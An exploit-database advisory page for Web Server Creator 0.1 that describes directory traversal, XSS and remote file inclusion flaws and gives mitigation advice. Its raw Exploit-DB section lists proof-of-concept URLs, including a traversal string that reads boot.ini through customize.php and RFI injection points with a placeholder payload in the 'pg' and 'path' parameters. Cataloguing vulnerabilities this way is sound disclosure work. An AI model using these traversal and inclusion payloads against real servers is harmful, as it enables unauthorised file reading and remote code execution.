header-logo
Suggest Exploit
vendor:
Web Server Creator
by:
indoushka
8,8
CVSS
HIGH
Directory Traversal, XSS, RFI
22, 79, 98
CWE
Product Name: Web Server Creator
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:comscripts:web_server_creator:0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2003

Web Server Creator – Web Portal v 0.1 Multi Vulnerability

The vulnerability allows an attacker to traverse directories and execute malicious code on the vulnerable server. An attacker can send a specially crafted HTTP request containing directory traversal strings (e.g. ../../../../../../../../boot.ini) to the vulnerable server in order to traverse directories and read sensitive files. Additionally, an attacker can inject malicious JavaScript code into the vulnerable web application via the 'pg' parameter in the 'index.php' script. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Finally, an attacker can exploit the 'path' parameter in the 'form.php' script to include arbitrary remote files from external sources.

Mitigation:

Input validation should be used to prevent directory traversal attacks. Additionally, HTML output should be properly encoded to prevent XSS attacks. Finally, remote file inclusion should be prevented by using a whitelist of allowed files.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Web Server Creator - Web Portal v 0.1 Multi Vulnerability      
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                             
| # Web Site : http://www.comscripts.com/scripts/php.web-server-creator.1082.html                                                                                                                            
| # Dork     : All right reserved 2002-2003 (MSN/Web Server Creator)                                        
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Multi                                                                     
======================      Exploit By indoushka       =================================
# Exploit  : 
 
 1- Directory traversal (Windows)

http://127.0.0.1/1082_webserve-01/news/include/customize.php?l=../../../../../../../../boot.ini
  
 2- XSS 
 
 http://127.0.0.1/1082_webserve-01/index.php?pg=forum
  
 3- RFI
 
 http://localhost/1082_webserve-01/index.php?pg=[EV!L]
 
 http://localhost/1082_webserve-01/news/form.php?path=[EV!L]
 
================================   Dz-Ghost Team   ========================================
Greetz : ÓíÏí ÈáÚÈÇÓ + Úíä ÇáÈÑÏ + ÔáÛæã ÇáÚíÏ K10 + K@MEL + Úíä ãáíáÉ + ÊÛäíÝ
-------------------------------------------------------------------------------------------